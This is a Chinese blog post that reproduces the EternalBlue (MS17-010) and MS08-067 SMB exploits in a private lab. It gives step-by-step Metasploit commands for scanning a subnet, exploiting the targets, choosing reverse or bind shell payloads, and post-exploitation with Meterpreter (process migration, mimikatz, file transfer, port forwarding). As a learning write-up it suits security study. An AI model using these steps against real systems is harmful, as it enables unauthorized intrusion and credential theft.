<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="漏洞复现,ms17_010,">










<meta name="description" content="内网环境下ms17_010的简单复现。">
<meta name="keywords" content="漏洞复现,ms17_010">
<meta property="og:type" content="article">
<meta property="og:title" content="ms17_010复现">
<meta property="og:url" content="http://yoursite.com/2019/11/12/ms17-010复现/index.html">
<meta property="og:site_name" content="pukr&#39;s BLOG">
<meta property="og:description" content="内网环境下ms17_010的简单复现。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/win7.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/status.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/postgresql.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/warning.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/msfconsole.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/msfconsole2.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/options.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/scan.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/exploit.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/payloads.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/meterpreter1.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/migrate.png">
<meta property="og:image" content="http://yoursite.com/2019/11/12/ms17-010复现/file1.png">
<meta property="og:updated_time" content="2022-04-24T00:35:08.392Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ms17_010复现">
<meta name="twitter:description" content="内网环境下ms17_010的简单复现。">
<meta name="twitter:image" content="http://yoursite.com/2019/11/12/ms17-010复现/win7.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/11/12/ms17-010复现/">





  <title>ms17_010复现 | pukr's BLOG</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">pukr's BLOG</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">人类的悲欢并不相通</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/11/12/ms17-010复现/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="尘林">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/zql.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="pukr's BLOG">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">ms17_010复现</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-11-12T15:44:23+08:00">
                2019-11-12
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>内网环境下ms17_010的简单复现。<br><a id="more"></a><br>攻击机：kali<br>目标机：win7<br>Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞，恶意代码会扫描开放445文件共享端口的Windows机器。<br>目前已知受影响的Windows 版本包括但不限于：WindowsNT，Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows2008 R2、Windows Server2012 SP0。<br>首先ms17_010是SMB协议引发的，所以在win7中设置防火墙入站规则。<br>需要打开SMB协议打印机共享。<br><img src="/2019/11/12/ms17-010复现/win7.png" alt><br>然后设置kali的msf。首先需要开启postgresql服务，先检查postgresql服务的状态：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service postgresql status</span><br></pre></td></tr></table></figure></p>
<p><img src="/2019/11/12/ms17-010复现/status.png" alt><br>没开启，那接下来开启服务。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service postgresql start</span><br></pre></td></tr></table></figure>
<p>再检查，发现成功开启。<br><img src="/2019/11/12/ms17-010复现/postgresql.png" alt><br>接下来启动msf。第一次启动时我遇到了这样的问题：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">WARNING: No database support: No database YAML file</span><br></pre></td></tr></table></figure>
<p><img src="/2019/11/12/ms17-010复现/warning.png" alt><br>这时候需要初始化一下数据库，执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfdb init</span><br></pre></td></tr></table></figure>
<p>再次启动msf时警告消失。<br>启动msf<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br></pre></td></tr></table></figure></p>
<p>这个界面真让人赏心悦目，卡哇伊。<br><img src="/2019/11/12/ms17-010复现/msfconsole.png" alt><br><img src="/2019/11/12/ms17-010复现/msfconsole2.png" alt><br>搜索ms17_010的相关操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">search ms17_010</span><br></pre></td></tr></table></figure>
<p>使用扫描功能先扫描目标网段，查看是否有主机存在漏洞。<br>使用相应功能。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/smb/smb_ms17_010</span><br></pre></td></tr></table></figure></p>
<p>查看那些参数需要设置。后面是s的如rhosts可以批量设置一个网段。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br></pre></td></tr></table></figure></p>
<p><img src="/2019/11/12/ms17-010复现/options.png" alt><br>后面是yes的就是需要设置的，有默认值的也可以。no的一般推荐使用默认值。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set rhosts 192.168.198.0/24    //设置扫描目标网段中存在此漏洞的主机。</span><br><span class="line">set threads 50    //设置线程，在本地跑就高一些，反正可以无限重来= =。</span><br><span class="line">run    //执行。run -j表示在后台执行，扫描的同时也就可以干点别的了。</span><br></pre></td></tr></table></figure>
<p><img src="/2019/11/12/ms17-010复现/scan.png" alt><br>那个绿色的加号就是存在漏洞的目标机器。醒目.jpg。<br>back返回。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">jobs -K    //杀掉所有进程</span><br><span class="line">jobs -k (参数)    //杀掉某一个进程</span><br><span class="line">jobs -i    //列举刚才的运行结果</span><br><span class="line">jobs -l    //列举正在进行的作业</span><br></pre></td></tr></table></figure>
<p>然后就可以使用攻击模块了。打一批的话总有中的23333。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use windows/smb/ms17_010_eternalblue</span><br><span class="line">show options</span><br><span class="line">set rhosts 192.168.198.132</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure></p>
<p><img src="/2019/11/12/ms17-010复现/exploit.png" alt><br>可见变成exploit()了，表示这是可利用程序；windows表示这是Windows平台；smb表示针对smb协议。<br>接收到了反弹的shell。<br>提权有一定风险，可能会把好不容易建立起来的连接断掉。</p>
<p>ps:<br>要是没有接收到反弹的shell，即不能溢出。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show payloads</span><br></pre></td></tr></table></figure></p>
<p>查看可利用的载荷，利用另一种载荷，即另一种反弹回来的shell。<br><img src="/2019/11/12/ms17-010复现/payloads.png" alt><br>针对不同服务器进行筛选。<br><strong>reverse表示等待对方连接我的服务器。</strong><br><strong>bind表示我的服务器连接目标机。</strong><br>reverse通常使用reverse_tcp，meterpreter等。<br>reverse_tcp_rc4表示用rc4进行加密，以增加通过防火墙的安全能力。<br>若远程溢出的程序在外网而我在内网，就不能使对方来连接我的服务器而是应该我的主动连接对方的服务器，即使用bind相关载荷。<br>默认的payload一般是reverse的形式反弹到4444端口。</p>
<p>补：ms08_067复现<br>攻击机：kali<br>目标机：windows xp<br>依然建立在smb协议上，需要打开SMB协议打印机共享。<br>我在尝试的时候只有关掉防火墙才成功，可是关掉防火墙又显得很鸡肋。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">search type:exploit smb</span><br><span class="line">use exploit/windows/smb/ms08_067_netapi</span><br><span class="line">show payloads</span><br><span class="line">set payloads windows/meterpreter/reverse_tcp    //常用payload：reverse_tcp</span><br><span class="line">set rhost 192.168.198.133</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure></p>
<p><img src="/2019/11/12/ms17-010复现/meterpreter1.png" alt><br>常见命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">bgrun    //meterpreter退到后台运行</span><br><span class="line">load    //加载其他第三方插件，如load mimikatz</span><br><span class="line">migrate    //迁移，将当前的进程迁移到另一个稳定的进程中。如浏览器进程不稳定，关掉浏览器连接也会断开，所以需要迁移</span><br></pre></td></tr></table></figure>
<p><img src="/2019/11/12/ms17-010复现/migrate.png" alt><br>文件系统命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">getlwd    //local本地目录</span><br><span class="line">getwd    //目标机进程目录</span><br><span class="line">show_mount    //加载磁盘数</span><br><span class="line">download</span><br><span class="line">upload</span><br></pre></td></tr></table></figure>
<p><img src="/2019/11/12/ms17-010复现/file1.png" alt><br>网络命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">portfwd    //端口映射，便于深层内网渗透</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/漏洞复现/" rel="tag"># 漏洞复现</a>
          
            <a href="/tags/ms17-010/" rel="tag"># ms17_010</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/05/代理与通道/" rel="next" title="代理与通道">
                <i class="fa fa-chevron-left"></i> 代理与通道
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/02/04/C语言内嵌汇编/" rel="prev" title="C语言内嵌汇编">
                C语言内嵌汇编 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/zql.jpg" alt="尘林">
            
              <p class="site-author-name" itemprop="name">尘林</p>
              <p class="site-description motion-element" itemprop="description">势，只会裹挟随波逐流之人。一心既定，便不问大势所趋。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">31</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">63</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">尘林</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

</body>
</html>
